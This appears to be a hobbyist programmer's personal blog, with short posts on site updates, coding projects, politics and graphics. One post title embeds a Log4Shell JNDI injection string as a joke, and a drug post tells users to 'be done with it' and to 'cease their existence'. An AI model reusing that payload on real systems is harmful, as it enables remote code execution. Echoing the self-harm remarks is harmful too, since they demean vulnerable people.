6/10/2021===hello, world! the site's got a new look, partially inspired by the fantastic design of antidepressant044(https://ad044.neocities.org/). hope you like it. i've got a fancy new js-powered blog generation thingy as well, and if you're reading this then it's all (probably) working. have fun. SPLITPOST 6/10/2021/2===(testing post generation) SPLITPOST 8/4/2021===been a while, huh? nothing interesting has happened -- i've mostly been shitting out code for some project or another, waiting for something to break me out of the pattern. expect a new textboard project soon, and an update on the /agdg/ engine. writing netcode for the latter has been keeping me awake until the birds chirp, so development will probably be slowing down soon. OOP csgo internal coming soon(tm). until we meet again: be kind to yourself, and others. SPLITPOST 9/3/2021===sorry for the downtime, i got a used r720 and had stuff to do/was too lazy to migrate the site over. mailserver soon maybe. SPLITPOST LET'S DO COKE (9/6/2021)===everyone always says drugs are bad, but you rarely hear why. it's not a very complex concept, but just like everything else repeated in th dystopian hellscape that is modern education it needs to be diluted into a message anyone can understand, efficacy be damned. here's the scoop: your mind defines you an an individual. eveybody knows that, right? you are you because of things that shifted your malleable self one way or another, eventually shaping the complex piece that is you. with this in mind, voluntarily taking mind altering substances means you are either: (a) suicidal in the unhappy-with-who-you-are sense, in which case you should either read some Camus or be done with it. alternately, (b) a very silly person, who either doesn't understand what you are doing, or simply doesn't care. the latter demographic should kindly cease their existence so as not to be a burden on society. SPLITPOST the real conspiracy (bad joke don't read) (9/20/2021)===>child killing demons with power in our system? yeah, I know about them. >wait, Comet Ping Pong? Washington D.C.? I was talking about /etc/systemd/system! SPLITPOST REBUILDING THE INTERNET (10/2/2021)===the current state of the "tech world" is horrifying. every passing month a new project gets infested with canceraids, whether it be "support" from a corporation (which eventually leads to the project only being developed by employees of that corporation see: web engines), endless bloating and spyware, or idealogy (yuck). discussion boards are flooded with brainless "coders" who are competent only in copying existing code/solutions and couldn't write something original if they tried, and real hackers are either infected or forced to dwell in dark corners, talking to the 10 other people who share their circumstances. write your own everything. (You) are the only person who can stop the rot. SPLITPOST MERRY CHRISTMAS TO ALL MY BLACKHATS ${jndi:ldap://dec.eleventh/2021}===LOG 4 SHELL also palindrome m/d/y stamp SPLITPOST tanoshii wa tanoshii da yo (write moar code do moar stuff) (1/22/2022)===i was browsing the interwebz earlier today, and i found some guy's version of the "pixel place" page. (https://lolcat.ca/pixel_page/) you upload an image, and it's resized to 20x20 pixels and placed on a certain coordinate in a 32x32 grid. naturally, my first instinct was to put together a script that chopped up a larger image and sent POST requests for every block. look -- pretty cool, right? (the image is at img/pixels.png because i'm too lazy to add images to the blog gen. pureasu undastandu) this wasn't difficult or challenging, but it was fun to write and it was pretty cool seeing the blocks come in one by one as the script ran (pausing between requests so aas not to trigger any anti-DoS stuff). next time you see something that would be cool, do it. it feels nice. oh, and happy new year! mine has been pretty alright so far, hopefully you feel the same way. adios. SPLITPOST ISSUES WITH IDEALOGY a.k.a. incoherent rambling a.k.a. politix (2/24/22)===do not read if you value your time or thoughts~ LIBERTARIANISM (in the modern sense, think Anarcho-Capitalism) The actual source doesn't seem to have stuck in my head, but I remember reading some blog or another online where the author said he found difficulty in imagining an intelligent self-developed political figure that was not at some point a libertarian. There is probably some truth of this -- other than libertarianism it could possibly be neoreaction (in the Moldbuggian or Landian [is that what it's called? "Dark Enlightenment" sounds very chunnibyou] flavor) or even neoliberalism as long as it's presented in a certain rationalist way. The key trait here is that they are all /mostly/ right, all correctly identifying problems and thinking in the correct ways to fix them, and all failing on hills that seem from a rational perspective to be a genuinely unfair design decision in the universe. In the specific case of Libertarianism, in any fair universe it would be correct -- after all, the idea of allowing the free market to naturally optimise allocation is so clean and functional that any programmer will instantly orgasm upon first udnerstanding it. The issue, accurately but improperly identified by critics, is the tragedy of the commons. Systemically, a free market system is one pollution analouge away from the benevolent invisible hand guiding its patrons to dump toxic waste in the communal pond to save a few cents, a practice that then becomes de facto standard, creating a new profit floor and punishing anyone that does not follow suit. Once it hits rock bottom and the free market (god bless it) innovates up a solution, the issue will temporarily subside until someone realizes not using the solution is more profitable for them /personally/ (even while recognizing it would be bad if everyone did it) and the cycle will restart. AUTOCRACY/AUTHORITARIANISM the one guy (or several guys) can be [A] Bad M[a/e]n(tm). If he/they is/are alright, then the next leadership might not be. If the first turnover seems alright, then the one after that might not me, repeat ex nihilo. You end up either getting a corrupt ruler or a decent ruler that renounces power, which rather defeats the point. DEMOCRACY people are dumb, and they only get better when bad things happen and they get taught to instinctively reject the causes. it is physically impossible for a diverse group of people to be collectively quick-witted. IMMIGRATION It's basically accepted by everyone that multiculturalism is a good thing -- it's an awfully generic answer, but cross-pollination of ideas and cultures really does create the best environment. Viewed at an instant this is very much true, and so says the progressive that we should allow as much immigration as humanly possible. Thinking about it for a moment though, there are clear issues with this. Imagine your favorite Howondlandian Art Appreciation forum -- there's probably some kind of stigma against new posters, and for good reason! Recognizable newfriends dilute the existing culture with their own, almost always (from the perspective of an old-school art connoisseur) making it worse. This is the dichotomy -- whether or not you are principally for or against immigration depends entirely on whether you have a timeless view of your fellow citizens. If the citizens of your country are the people who are citizens in the moment, then excess immigration /will/ result in a loss of the culture that has been built (let's say our hypothetical nation started as a multicultural one) and the average experience of the people who matter more will be worsened. From the other perspective, anyone that immigrates is a citizen, present or future. Looking at it from this angle, your good society will collectively lose an amount of average culture that is comprable to the amount the immigrant has gained individually, and there will be a net zero change that increases culture diversity. All of this is of course assuming that the immigrant will be a minority and will assimilate -- I've never heard anyone with a straight face argue against majority immigration and non-assimilating migrants are entirely harmful until their resolve dissipates 1-3 generations later. SPLITPOST shaders are evil tools of the devil (3/3/22)===also, graphics cards. the history of graphics programming is full of people who sold their soul for a "brilliant idea" that brings "revolutionary efficiency". you put textmdode glyphs on another chip's ROM? that's pretty handy! we can send it instructions and it'll build te framebuffer on its end and push it to the monitor? that's really cool, we can save a ton of cycles by delegating like that! skip a few decadesd and look were we are now. i recognize that it is practically impossible to get decent performance without doing something like this, but bitbanging VGA on an arduino really helps you appreciate simplicity. SPLITPOST a neat perspective on physicalism (contextualizing beings as bio-mechanical beasts) (8/21/22)===as a self-professed engineer~y fellow, I tend to see things from that perspective. physicalist people, as science fiction might have drilled into you, are computer-type things that walk around and have hubris enough to assume they're special for thinking about themselves in the abstract. their brain acts like a modern programmable chip -- recursing forever over a program that gives us the ability to take in inputs and interpret them to form concepts. metaphysics aside, this model works. unlike (most) people, you might have noticed that insects are rather stupid. if you block the path of one, it will act like a dumber class of robot and keep trying different methods until it gets around it, theoretically because it cannot conceive of particular obsiticles as things with distinct failure modes and is instead shipped with a tiny chip that makes their behaviour similar to that of a vacuuming bot. the pseudo-electrical pathways to do this would have been evolved in the normal manner, of course. it's neat in both the "clean" and "cool" definitions!